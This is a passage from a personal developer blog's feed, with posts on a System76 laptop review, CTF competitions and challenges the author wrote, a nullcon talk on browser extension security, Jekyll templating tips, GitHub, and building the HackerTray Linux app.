<code class="language-plaintext highlighter-rouge">rake:notes</code> is easy and super-awesome. 
It allows you to spread your notes about TODOs, FIXMEs and such throughout your codebase and take a bird’s-eye look at them with just a single command.</p> <p>Read more about it at <a href="http://siong1987.com/posts/powerful-and-hidden-rake-notes-in-rails/">http://siong1987.com/posts/powerful-and-hidden-rake-notes-in-rails/</a></p> A month with the System76 Galago Ultra Pro 2014-07-04T00:00:00+00:00 https://captnemo.in/blog/2014/07/04/galago-ultra-pro-review <p>With my recent <a href="/blog/2014/06/03/cctc-wave-3/">CCTC Winnings</a>, I decided to purchase a new laptop as my old Dell Inspiron was not performing up to the mark. Being of a time before the Intel i-series launch, it was also severely lacking in several features, most notably virtualization support, which is badly needed these days.</p> <p>After taking a thorough look at the various offerings in the market (and being disappointed by most of them), I decided to go with the System76 Galago Ultra Pro for the following reasons:</p> <ul> <li>Linux Support (Just Ubuntu actually, but it’s nice to have a laptop that supports and comes with Linux pre-installed).</li> <li>Intel HD 5200 Graphic Card. Even though the nVidia/ATI support has been getting better in Linux these days, I wanted a graphic card that I could use without worry, for both playing games and using WebGL, without having to worry about things like overheating and switching card modes (optimus/bumblebee and whatnot).</li> <li>Haswell. Not many manufacturers are currently offering Haswell lineups, and System76 is one of the few with them in the market.</li> </ul> <p>The other few machines I did consider included the Apple MBP, Lenovo Ideapad, Dell Sputnik 13. 
The MBP was rejected because I wanted a Linux machine, and it was overly costly; the Ideapad had a touch screen, which I abhor; and finally the Sputnik is too expensive as well.</p> <p>A few other machines were rejected because I was exclusively looking for a 14-inch screen, due in part to my experience with my previous bulky machine.</p> <h2 id="hardware-review">Hardware Review</h2> <p>The build quality of the Galago is above average, but it’s still a flimsy offering, when compared to the MBP or other business class offerings such as the Vostro. A lot of the Galago reviews on the internet talk about the defective keyboards, but I faced no such issues. It seems to have been fixed, and the keyboard has been iterated several times since, I think.</p> <p>The IPS screen (1920x1080) is a real gem, and I’ve gotten used to watching everything in full HD these days. The laptop has 2 small fans on the lower side, and they hardly ever kick in, making it a quiet laptop. The only time it heats up much is when I’m playing demanding games or doing something GPU intensive. A few issues that I’ve actually faced with it include:</p> <ul> <li>The <code class="language-plaintext highlighter-rouge">Esc</code> key not responding to all presses. I have to hit it with slightly extra pressure for each keypress to register. However, this is just a quirk I’ve come to accept, and work around. My muscle memory soon took over and I’m now used to pressing it hard.</li> <li>Missing Media keys. It does have the usual Mute, Volume, and the Play/Pause keys, but the next/previous media keys are missing on the keyboard.</li> <li>The charger getting heated up (a lot). It even heats up when the charger is not connected to the laptop.</li> <li>The inbuilt speaker quality is definitely not above average. 
I usually use my earphones with it, so it’s not much trouble to me anyway.</li> <li>The “clickpad” becomes a “touchpad” in Windows, which means drag-drop becomes extremely uncomfortable if you’re not used to it. I’ve installed the official touchpad drivers in Windows from knowledge76, but I could not find a setting to use “clicks” instead of “touch”.</li> </ul> <p>As an aside, I really like the keyboard layout (I don’t like numeric keypads much) and the placement of Del-End keys, which is incidentally the same as my previous laptop. I really dislike those layouts where you have to press a combination of Fn+Some key just to trigger Page Up/Down. A note to laptop manufacturers: <a href="http://arstechnica.com/staff/2014/01/stop-trying-to-innovate-keyboards-youre-just-making-them-worse/">Please stop messing with the keyboards</a>.</p> <p>Having a branded Ubuntu key is also a good show-off at some places :) I also have to mention that the laptop is very silent. The fans rarely kick in, and I have faced no heating issues so far.</p> <h2 id="software-side">Software Side</h2> <p>Despite being built for Linux, I’ve still faced a few software issues on Linux. None of these are a deal-breaker though for me. The first time I realized that it wasn’t really built for Linux was when I booted using my external to Ubuntu 12.04 and the WiFi didn’t work. Apparently you need a combination of System76 custom (though open-source) drivers and 14.04 on this machine to get the drivers to work. This is one of the reasons I haven’t downgraded to Elementary Luna (which is based on Ubuntu 12.04). The issues I’ve faced (along with my workarounds) include:</p> <ul> <li>Flash not working on Google Chrome Stable. I talked to System76 support over this, and I’m yet to get it working. As a workaround, I’ve been using Google Chrome Unstable (which I usually use anyway), and it detects flash fine.</li> <li>WebGL support in Chrome is a bit sketchy. 
Chrome stable doesn’t detect the graphic card as supported, while the Chrome Unstable version did detect it as working for a while, but the graphic card was either removed from the whitelist, or added to the blacklist in a future update, making it non-working again. Currently, I’m using the “Disable WebGL Blacklist” flag from <code class="language-plaintext highlighter-rouge">chrome://flags</code> to get it working.</li> <li>Webcam not being detected. This has gotten me a bit puzzled. It was working fine on the fresh Ubuntu 14.04 setup, but some driver issue is preventing it from working now. I think a dist-upgrade should fix it, but I’m not sure. I might try to re-install the <code class="language-plaintext highlighter-rouge">system76-driver</code> package if that doesn’t work. <strong>Update</strong>: It started working again after just a restart.</li> <li>Another minor issue I face is that the brightness key on the keyboard (Fn+F8/F9) allows you to take the brightness level all the way down to <em>zero</em>. So you could make your screen pitch-black, with absolutely no idea how to get it back to normal. This happens only on ubuntu, though.</li> </ul> <h2 id="overall">Overall</h2> <p>Despite its few quirks, I’m liking my new laptop. I’m enjoying gaming on it (on both Linux and Windows), and it has more than enough power to run whatever combination of VMs I want to.</p> <h2 id="gaming">Gaming</h2> <p>All the Linux games from my various Humble Bundle purchases are finally being put to good use. The only game that I haven’t been able to run is Oilrush, which doesn’t support Intel Graphic cards on Linux for some reason. 
Some of the games that I’ve tried and enjoy on Linux include:</p> <ul> <li>Mark of the ninja</li> <li>The Swapper</li> <li>Don’t Starve</li> <li>Fez</li> <li>Bit Trip Runner 2</li> <li>Counter Strike: Source</li> <li>Portal</li> <li>Half-Life 2</li> <li>Civilization 5</li> <li>Trine 2</li> <li>Minecraft</li> </ul> <p>Trine 2 does show some noticeable lag on full settings, but it’s not supported on Intel drivers anyway. The rest of the games run wonderfully on full settings.</p> <p>I haven’t tried gaming much on Windows, but I do play Blur (admittedly a 3 year old game) sometimes on it at the highest settings.</p> <h2 id="specs">Specs</h2> <p>The only thing I upgraded in my laptop was an increase in RAM from the default of 4GB to 8GB, primarily because I intend to run lots of VMs on this machine. The rest is the same as the specs <a href="https://system76.com/laptops/model/galu1">on the official site</a> (scroll to bottom):</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Processor: Intel(R) Core(TM) i7-4750HQ CPU @ 2.00GHz
RAM: Samsung, SODIMM DDR3 Synchronous 1600 MHz (0.6 ns), M471B5173QH0-YK0 (4GiB) x2
Graphic Card: Intel Iris Pro Graphics 5200 with 128 MB eDRAM, Crystal Well Integrated Graphics Controller
Hard Disk: Western Digital, WDC WD5000LPVX-2, 500GB (465GiB)
Memory: 8GB 204 pin Dual Channel DDR3 @ 1600 MHz (2x4GB)
Intel ME Version: 9.0.20.1447
</code></pre></div></div> <p>If you’re interested in getting any further details about the laptop, feel free to <a href="/contact/">contact</a> me.</p> Deloitte CCTC Wave III 2014-06-03T00:00:00+00:00 https://captnemo.in/blog/2014/06/03/cctc-wave-3 <p>I was the winner of the Deloitte CCTC Wave I, and a finalist for the Wave II. It was natural that I would participate this year as well.
While the first year involved a simple penetration test as the first round, and it was an abstract submission in Wave II; this time it was a closed jeopardy-style CTF contest between different teams from various colleges.</p> <p>There were altogether more than 30 teams participating in the CTF. I was lucky to have teammates like <a href="http://abhishekdas.com/">Abhishek Das</a>(CCTC Wave II Winner) and <a href="http://rkravi.com/">Ravi Kishore</a> who endured through several challenges when I gave up.</p> <p>We’ve published all challenges over on <a href="https://github.com/captn3m0/cctc3-solutions">GitHub</a> along with writeups and problems being made available wherever we can.</p> <p>The challenges ranged from very easy to difficult to absurd trivia. We topped the round with the most number of points across the board, making sure we got the +30 bonus for solving first on all but 2 challenges out of 13.</p> <p>We’ll be leaving for Hyderabad for the finals in the first week of April. Wish us luck, will you.</p> <p><strong>Update</strong>: We won the final event at Hyderabad as well. More details (and a pic) on our blog post on SDSLabs <a href="https://blog.sdslabs.co/2014/05/deloitte-cctc">here</a>.</p> BackdoorCTF and Quizzes 2014-03-25T00:00:00+00:00 https://captnemo.in/blog/2014/03/25/backdoor-and-quizzes <p>I recently hosted a Geek Quiz at my college along with <a href="https://www.facebook.com/giridaran">Giri</a>. The quiz was mostly geek with some sports and pop-cult trivia. 
Here are the slides for the quiz (both prelims and finals):</p> <h3 id="geek-quiz-prelims">Geek Quiz Prelims</h3> <script async="" class="speakerdeck-embed" data-id="78823f30958e0131cd82465820109070" data-ratio="1.33333333333333" src="//speakerdeck.com/assets/embed.js"></script> <h3 id="geek-quiz-finals">Geek Quiz Finals</h3> <script async="" class="speakerdeck-embed" data-id="d0e39860959001313c81768fd0aa6b5a" data-ratio="1.33333333333333" src="//speakerdeck.com/assets/embed.js"></script> <p>Some audio/video files for the finals are up <a href="http://ge.tt/8O1nGbN1/">here</a>.</p> <h2 id="backdoorctf-2014">BackdoorCTF 2014</h2> <p>Last year, I was the coordinator for Backdoor CTF 2013, a jeopardy-style CTF contest hosted by <a href="http://fb.me/SDSLabs">SDSLabs</a> under the aegis of Cognizance. This year, I contributed 3 problems to the CTF. The problems were as follows:</p> <ol> <li><a href="https://backdoor-web200.herokuapp.com/">web200</a> - Timing Attack (<a href="https://github.com/backdoor-ctf/web200">Source</a>)</li> <li><a href="https://backdoor-web250.herokuapp.com/">web250</a> - YAML Code Execution (<a href="https://github.com/backdoor-ctf/web250">Source</a>)</li> <li><a href="https://backdoor-web100.herokuapp.com/">web100</a> - _ Template Code Execution (<a href="https://github.com/backdoor-ctf/web100">Source</a>)</li> </ol> <p>You can find writeups/solutions to the problems all over the internet and on <a href="https://ctftime.org/event/141/tasks/">ctftime</a>. Hosting a CTF is always a humbling experience and it was great to see teams from all over the world participating in backdoor. We hope to return next year with even better challenges.</p> <h2 id="cogni-geek-quiz">Cogni Geek Quiz</h2> <p>After that I teamed up with Giri again (along with Sukun) for the Cogni Geek Quiz, hosted by the winner of my quiz, <a href="https://www.facebook.com/TheDudeWhoKnocks">Vikram Rathore</a>. 
While we won the quiz by a large margin (30 points), I managed to get my own tribute question wrong unfortunately.</p> <p>However, it was a great experience involving some really nice questions. <em>Update</em>: The slides are up at <a href="https://mega.co.nz/#F!nso0VaiK!IUBob8dqOM0UAD_Eti6DfA">mega</a>.</p> <h2 id="colors--typefaces">Colors &amp; Typefaces</h2> <div class="colophon"> <div class="color" style="border-top: 20px solid #cbe86b">#cbe86b</div> <div class="color" style="border-top: 20px solid #1c140d">#1c140d</div> <div class="typeface"><b>Typeface</b>Oswald</div> <div class="typeface"><b>Typeface</b>Lato</div> <div class="clear"></div> </div> <div class="colophon"> <div class="color" style="border-top: 20px solid #2e2633">#2e2633</div> <div class="color" style="border-top: 20px solid #99173c">#99173c</div> <div class="typeface"><b>Typeface</b>Oswald</div> <div class="typeface"><b>Typeface</b>Lato</div> <div class="clear"></div> </div> My experience at nullcon 2014 2014-03-13T00:00:00+00:00 https://captnemo.in/blog/2014/03/13/nullcon-experience <p>I was recently a speaker at <a href="http://nullcon.net/website/">nullcon 2014</a>, a premier infosec conference in India. My talk was a re-hash of <a href="https://speakerdeck.com/captn3m0/a-security-analysis-of-browser-extensions">my earlier talk</a> at Deloitte CCTC-2 and was titled <em>“Browser Extension Security”</em>.</p> <p>I applied for the CFP sometime in November with a copy of my talk, paper and code I’d used. My application was reviewed and I was told, accepted under the night-track on 13th February.</p> <p>The <a href="https://speakerdeck.com/captn3m0/browser-extension-security">talk itself</a> covered browser security mechanisms, and where the current state of art lies (Chrome) with respect to Browser Extensions. 
The talk was pretty well received (even though I sweated a lot onstage), and a lot of attendees came up to me to discuss it further after the talk.</p> <p>The paper behind the talk, and the related source code can be found on <a href="https://github.com/captn3m0/nullcon2014/">GitHub</a>. Create a new issue or send me an email in case you have any queries. <del>The tool demo I gave during the talk can be found at http://nullcon.captnemo.in</del> (Not available anymore). Note, however, that it currently uses cached data to check for permissions, and is not a LIVE tool.</p> <p>nullcon was my first conference, and I’m glad to say I enjoyed it very much. From the great hosts to the amazing parties, and all the free booze, I loved it all. I made a lot of friends, and I plan on keeping in touch. The networking level was amazing at the conference, and I was happy to get in touch with so many guys in the industry, so to speak.</p> <p>A lot of people queried me about future research on the topic, and while I currently do not have enough time to pursue it, it’s on my radar of things to do. I’m also thinking of getting in touch with the Chrome Security Team with my research.</p> <p>As an aside, a big thanks to <a href="https://twitter.com/rushil92">Rushil</a> for helping me in the first version of the paper for CCTC. It wouldn’t have been possible without him.</p> <h2 id="some-clicks">Some Clicks</h2> <iframe class="imgur-album" width="100%" height="550" frameborder="0" src="http://imgur.com/a/MCo8s/embed"></iframe> <p>I’m still waiting on receiving official clicks from nullcon. Will update this post when I get my hands on them.</p> Using Jekyll optimally without plugins 2014-01-20T00:00:00+00:00 https://captnemo.in/blog/2014/01/20/pluginless-jekyll <p>If you’re a programmer, by now you’ve surely heard of the various static-site compilers that are taking over the world.
My pick of choice is Jekyll (about which I’ve <a href="/blog/2011/09/19/jekyll/">blogged earlier</a> as well), mostly because it is the default supported tool for the GitHub Pages service. Read <a href="/blog/2011/09/19/jekyll/">my earlier blog post</a> if you don’t know about Static Site Generators.</p> <p>Using Jekyll means that it is far easier for me to host my blog on GitHub Pages by just writing down posts in plain markdown. Markdown, for those of you who don’t know, is a simple markup language that uses an email-like syntax that is then compiled to HTML.</p> <p>A lot of power in Jekyll comes from its various plugins, but I’ve always been wary of using them as the default host for Jekyll (GitHub Pages) disables all plugins and runs in safe mode. Plugins are an awesome tool to have, but they are only good if you are hosting the site on your own machines. I’m not shying away from using them but want to point out that plain-Jekyll itself is powerful enough to do most of the tasks. What follows are some examples of how to use Jekyll optimally.</p> <h2 id="data-files">Data Files</h2> <p>This is a <a href="http://jekyllrb.com/docs/datafiles/">recent addition</a> in Jekyll that lets you keep data in YAML files inside the <code class="language-plaintext highlighter-rouge">_data</code> directory and access it anywhere using the <code class="language-plaintext highlighter-rouge">site.data</code> prefix. For instance, I recently shifted the <a href="http://team.sdslabs.co/">SDSLabs Team Page</a> from plain HTML to Jekyll, and I used a data file to define all the required elements that are shown for every user.
The data file looks something like this (<code class="language-plaintext highlighter-rouge">_data/members.yml</code>):</p> <figure class="highlight"><pre><code class="language-yaml" data-lang="yaml"><span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Abhay</span><span class="nv"> </span><span class="s">Rana"</span>
  <span class="na">pic</span><span class="pi">:</span> <span class="s2">"</span><span class="s">abhay.jpg"</span>
  <span class="na">links</span><span class="pi">:</span>
    <span class="na">Facebook</span><span class="pi">:</span> <span class="s2">"</span><span class="s">https://facebook.com/capt.n3m0"</span>
    <span class="na">Twitter</span><span class="pi">:</span> <span class="s2">"</span><span class="s">https://twitter.com/captn3m0"</span>
<span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Team</span><span class="nv"> </span><span class="s">SDSLabs"</span>
  <span class="na">pic</span><span class="pi">:</span> <span class="s2">"</span><span class="s">sdslabs.jpg"</span>
  <span class="na">links</span><span class="pi">:</span>
    <span class="na">Facebook</span><span class="pi">:</span> <span class="s2">"</span><span class="s">https://facebook.com/SDSLabs"</span>
    <span class="na">Twitter</span><span class="pi">:</span> <span class="s2">"</span><span class="s">https://twitter.com/sdslabs"</span></code></pre></figure> <p>Then, I iterate over this data using the following syntax:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html">{% for member in site.data.members %}
  <span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">"pics/{{member.pic}}"</span> <span class="na">alt=</span><span class="s">"{{member.name}}"</span><span class="nt">&gt;</span>
  <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"img-bar"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;span</span> <span class="na">class=</span><span class="s">"img-title"</span><span class="nt">&gt;</span>{{member.name}}<span class="nt">&lt;/span&gt;</span>
    <span class="nt">&lt;span</span> <span class="na">class=</span><span class="s">"img-icons"</span><span class="nt">&gt;</span>
      {% for link in member.links %}
        <span class="c">&lt;!-- link[0] holds the hash key = facebook/twitter --&gt;</span>
        <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"{{link[1]}}"</span><span class="nt">&gt;&lt;img</span> <span class="na">src=</span><span class="s">"assets/{{link[0]|downcase}}.png"</span><span class="nt">&gt;&lt;/a&gt;</span>
        <span class="c">&lt;!-- link[1] holds the hash value--&gt;</span>
      {% endfor %}
    <span class="nt">&lt;/span&gt;</span>
  <span class="nt">&lt;/div&gt;</span>
{% endfor %}</code></pre></figure> <p>Earlier, you could have achieved the same thing by adding this data to your <code class="language-plaintext highlighter-rouge">_config.yml</code> file, but the <code class="language-plaintext highlighter-rouge">_data</code> folder allows you to store data properly in various files, if needed.</p> <h2 id="liquid-filters">Liquid Filters</h2> <p>Since Jekyll relies on <a href="http://liquidmarkup.org/" title="Liquid Markup Language">Shopify’s Liquid</a> language for templating purposes, it has a very large list of supported functions, filters and markup tools ready for you to use.
For instance, while working on the <a href="http://sdslabs.co/">SDSLabs Portfolio</a>, I used the split and downcase filters to convert a known list of categories to single word objects that could be used as file names.</p> <figure class="highlight"><pre><code class="language-html" data-lang="html">{% for category in site.data.category %}
  <span class="c">&lt;!-- category is something like "Web Development"--&gt;</span>
  {% assign category_name = category|split: ' '|first|downcase %}
  <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"/category/{{category_name}}.html"</span><span class="nt">&gt;</span>{{ category }}<span class="nt">&lt;/a&gt;</span>
{% endfor %}</code></pre></figure> <p>The above snippet converts a string like “Web Development” to a smaller string “web” that can be used by us for filenames much more easily.</p> <p>You can check out more liquid filters <a href="https://docs.shopify.com/themes/liquid-basics/output">over here</a>. These include things like <code class="language-plaintext highlighter-rouge">plus</code>, <code class="language-plaintext highlighter-rouge">times</code>, <code class="language-plaintext highlighter-rouge">reverse</code>, and even <code class="language-plaintext highlighter-rouge">md5</code> (helpful for gravatars).</p> <h2 id="code-highlighting">Code Highlighting</h2> <p>Markdown is really awesome, but it lacks Syntax Highlighting for code. Jekyll uses <a href="http://pygments.org/">pygments</a> to support syntax highlighting for various languages.
To highlight a piece of code, you just use the following syntax:</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">{% highlight ruby %} def show @widget = Widget(params[:id]) respond_to do |format| format.html # show.html.erb format.json { render json: @widget } end end {% endhighlight %}</code></pre></figure> <p>And the output will look like this:</p> <figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">def</span> <span class="nf">show</span> <span class="vi">@widget</span> <span class="o">=</span> <span class="no">Widget</span><span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="ss">:id</span><span class="p">])</span> <span class="n">respond_to</span> <span class="k">do</span> <span class="o">|</span><span class="nb">format</span><span class="o">|</span> <span class="nb">format</span><span class="p">.</span><span class="nf">html</span> <span class="c1"># show.html.erb</span> <span class="nb">format</span><span class="p">.</span><span class="nf">json</span> <span class="p">{</span> <span class="n">render</span> <span class="ss">json: </span><span class="vi">@widget</span> <span class="p">}</span> <span class="k">end</span> <span class="k">end</span></code></pre></figure> <h2 id="custom-permalinks">Custom Permalinks</h2> <p>Everyone knows about handling the blog posts permalink using the permalinks setting in <code class="language-plaintext highlighter-rouge">_config.yml</code>. But did you know that you can provide custom permalink to any page in your site? For instance, the Jekyll documentation site uses the following:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>permalink: /docs/config/ </code></pre></div></div> <p>in the frontmatter for the file <code class="language-plaintext highlighter-rouge">docs/configuration.md</code>. 
The file would have been published to <code class="language-plaintext highlighter-rouge">docs/configuration.html</code> by default, but the permalink in the file forces it to be published to <code class="language-plaintext highlighter-rouge">/docs/config/index.html</code>. It’s a really nice setting that allows you to customize the post url for any particular post.</p> <h2 id="raw-liquid-tag">Raw Liquid Tag</h2> <p>In the rare case that you want to use liquid-like syntax somewhere (say you are using Handlebars, which uses {{{variable}}} to echo variables), you can use the following syntax:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{% raw %}
Here is some {{mustache}}
{% endraw %}
</code></pre></div></div> <p>In fact, I’ve used the raw tags a lot in this blog post to escape all the liquid portions. You can see the <a href="https://github.com/Shopify/liquid/wiki/Liquid-for-Designers">liquid documentation</a> for more help.</p> <p>Side Note: Writing the endraw tag in liquid is <a href="http://blog.slaks.net/2013-06-10/jekyll-endraw-in-code/">really, really hard</a>.</p> <h2 id="embedding-htmlcss-inside-markdown">Embedding HTML/CSS inside markdown</h2> <p>Sometimes, there are some things that just can’t be done with markdown. For instance, if you need to use a custom tag, or need to write some css within the markdown document for some reason, there is always a way: just embed content inside <code class="language-plaintext highlighter-rouge">&lt;div&gt;</code> tags. This is not a Jekyll feature, but an implementation detail of Markdown itself, but I think it’s hacky enough to get a mention here.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Writing **markdown** here

&lt;div&gt;
    &lt;style&gt;
        body{
            margin-top: 10px;
        }
    &lt;/style&gt;
&lt;/div&gt;

Back to _Markdown_.
</code></pre></div></div> <p>Anything inside a <code class="language-plaintext highlighter-rouge">&lt;div&gt;</code> tag is untouched by Markdown, and is rendered as it is.</p> On GitHub 2013-12-25T00:00:00+00:00 https://captnemo.in/blog/2013/12/25/on-github <p>I am an Internet addict. And the website I’m most addicted to is called GitHub. GitHub is a social code hosting website that is totally awesome. Not your general run-of-the-mill awesome, but rather ass-kicking best-thing-in-the-world awesome. If GitHub was a ninja, it would be Po, defeating the evil clutches of SourceForge.</p> <p>When Linux was released a couple of decades ago, it was hosted on a university FTP server. Today, the days of FTP are way past, and unless your code is hosted on a code-sharing website like GitHub, it is as good as dead. The last decade has seen an explosive growth in software and the open source movement. Things like GitHub, Linux, Android, Facebook have been made possible due to the combined efforts of millions across the globe following the Unix philosophy of doing one thing well.</p> <p>Ahh, I digress. The point I’m trying to make is that it is very hard to explain to a layman how important GitHub has been to the software community. It has been used as a collaboration platform for writers, law makers, governments, programmers, and even musicians. People have used its issue tracking feature to even plan weddings. And above all, people adore GitHub. It is one of the few startups that have been accorded God status in the community.</p> <p>The question here is what makes GitHub tick? As the largest hosting site for code, it obviously makes a huge impact just by virtue of being there. But its tide of features and innovative progression has made it a darling of all. For instance, their 1 click to fork feature has allowed people to contribute to any project much more easily.</p> <p>GitHub has an amazing User Experience, making sure it works perfectly on all devices large or small.
Their amazing support makes sure all of its users are as happy as possible. Their regular meetups make sure that GitHub is invested in the software community themselves. And their GitHub Store lets people invest back in GitHub by promoting them via Tees, stickers and even laptop sleeves.</p> <p>My personal experience with GitHub has been overwhelmingly positive. People have stood beside GitHub even as they faced major issues, and for me that is indicative of a trust in GitHub that no money can buy. The GitHub API (which I’ve used more than once) lets developers create their own apps on top of GitHub which others can use to create even more awesome things.</p> <p>For me GitHub is more than just a coding website. It is a testament to creativity and the Hacker Way, reminding me every day that anything is possible.</p> Making HackerTray 2013-11-28T00:00:00+00:00 https://captnemo.in/blog/2013/11/28/making-hackertray <p>A few days back, I found the excellent <a href="http://hackerbarapp.com/">HackerBarApp</a> via Hacker News. Hacker News, for those of you who don’t know, is a tech news website run by <a href="http://ycombinator.com">YCombinator</a>. Hacker Bar was the simplest way of accessing HN stories that I’d ever seen. Unfortunately, it was only for Mac (made using <a href="http://www.rubymotion.com/">rubymotion</a>) and even though the source was available, it was of no use to me as a Linux User.</p> <p>I decided to make a clone of Hacker Bar that would work on Linux. My first choice of the stack was <a href="https://github.com/rogerwang/node-webkit">node-webkit</a>, an application framework that allows you to build cross-platform applications using HTML, CSS, JS, and modules from the node.js ecosystem. After reading a lot about node-webkit, I figured out that building this application in node-webkit (as it stands) would not be possible.
Or rather, it would not work under Ubuntu and its derivatives because of the lack of appindicator support in <a href="https://github.com/rogerwang/node-webkit/issues/1087">node-webkit</a>. More details <a href="https://groups.google.com/d/topic/node-webkit/FeX7YYwK8jI/discussion">here</a>.</p> <p>The next obvious language and stack of choice was Python + Gtk. I’d already played a little bit with Gtk and Python some time back, so I knew the basics. But I’d never built a real application with PyGtk, just toys and small scripts. I found a <a href="http://www.eurion.net/python-snippets/snippet/Create%20an%20Application%20Indicator.html">basic skeleton app</a> that was written for AppIndicator and modified it somewhat to form the base of HackerTray.</p> <p>The next challenge I faced was keeping the check boxes always checked regardless of the number of clicks after the first. That is, we don’t want any menu item to be “un-checked” at any moment. A basic idea is to do this (partial code):</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="n">webbrowser</span>

<span class="k">def</span> <span class="nf">open</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">widget</span><span class="p">):</span>
    <span class="k">if</span><span class="p">(</span><span class="n">widget</span><span class="p">.</span><span class="n">get_active</span><span class="p">()</span> <span class="o">==</span> <span class="bp">False</span><span class="p">):</span>
        <span class="n">widget</span><span class="p">.</span><span class="n">set_active</span><span class="p">(</span><span class="bp">True</span><span class="p">)</span>
    <span class="n">webbrowser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">widget</span><span class="p">.</span><span class="n">url</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">addItem</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">item</span><span class="p">):</span>
    <span class="c1"># create a new CheckMenuItem (i)</span>
    <span class="n">i</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">'activate'</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="nb">open</span><span class="p">)</span></code></pre></figure> <p>However, this does not work as expected, because the <code class="language-plaintext highlighter-rouge">widget.set_active()</code> call also results in the <code class="language-plaintext highlighter-rouge">activate</code> event being fired, which ultimately calls <code class="language-plaintext highlighter-rouge">open</code>. This means on a click to an unchecked menuItem, the open function is called twice. This results in the browser opening the link twice.</p> <p>As a workaround, I disconnect the event handler while re-checking the menuItem, and reconnect it afterwards:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="n">webbrowser</span>

<span class="k">def</span> <span class="nf">open</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">widget</span><span class="p">):</span>
    <span class="k">if</span><span class="p">(</span><span class="n">widget</span><span class="p">.</span><span class="n">get_active</span><span class="p">()</span> <span class="o">==</span> <span class="bp">False</span><span class="p">):</span>
        <span class="c1"># Disconnect the handler so that set_active() does not call open() again</span>
        <span class="n">widget</span><span class="p">.</span><span class="n">disconnect</span><span class="p">(</span><span class="n">widget</span><span class="p">.</span><span class="n">signal_id</span><span class="p">)</span>
        <span class="n">widget</span><span class="p">.</span><span class="n">set_active</span><span class="p">(</span><span class="bp">True</span><span class="p">)</span>
        <span class="n">widget</span><span class="p">.</span><span class="n">signal_id</span> <span class="o">=</span> <span class="n">widget</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">'activate'</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="nb">open</span><span class="p">)</span>
    <span class="n">webbrowser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">widget</span><span class="p">.</span><span class="n">url</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">addItem</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">item</span><span class="p">):</span>
    <span class="c1"># create a new CheckMenuItem (i)</span>
    <span class="c1"># Connect once and keep the handler id so that open() can disconnect it</span>
    <span class="n">i</span><span class="p">.</span><span class="n">signal_id</span> <span class="o">=</span> <span class="n">i</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="s">'activate'</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="nb">open</span><span class="p">)</span></code></pre></figure> <p>The next thing I worked on was a persistent memory for the app. In a nutshell, I needed to make sure that the tick on an item remained there, even if the app was restarted. This meant writing a list of all the “viewed” items into a file.
After looking at <a href="http://docs.python.org/lib/module-shelve.html">shelve</a> for a bit, I just <a href="https://github.com/captn3m0/hackertray/commit/167397e51f665847400617935653027ebba0b396">rolled my own implementation</a> , based on storing the data into <code class="language-plaintext highlighter-rouge">~/.hackertray.json</code> file.</p> <p>After that I worked on packaging the app into a python package, so that it could be easily installed. The <a href="https://python-packaging.readthedocs.io/en/latest/">python packaging tutorial</a> was an easy to use guide that let me <a href="https://github.com/captn3m0/hackertray/commit/6ca735ea089d9189f152612ed016d31d72f9c36b">create the package</a> easily and push it to the <a href="https://pypi.python.org/pypi/hackertray/">Python Package Index</a>. A few issues in the package were found, and were fixed quickly thanks to <a href="https://github.com/captn3m0/hackertray/pull/7">the pull request</a> by <a href="https://github.com/brunal">@brunal</a>.</p> <p>After improving the README a bit, I posted about it on Hacker News, where it failed to get any traction. I re-tried with a link to the HackerTray website, and that fell flat as well. It was on the next day, when I <a href="https://news.ycombinator.com/item?id=6819042">posted it to HN</a> for the third time, that it took off. After 50 or so upvotes, I found that my instance refused to run because it had hit the API Rate Limit on the excellent <a href="https://node-hnapi.herokuapp.com/">node-hnapi</a>. I quickly <a href="https://github.com/captn3m0/hackertray/commit/8f0b08137b6c4b05ebe63a33029a36c068cfbc05">pushed a fix</a> that used a list of servers to hit as fallback in case it crossed the Rate Limits.</p> <p>After a lot of feedback from HN, I started work on a <code class="language-plaintext highlighter-rouge">node-webkit</code> based clone of hackertray for Windows. I should be able to release it in a few more days, if nothing else crops up. 
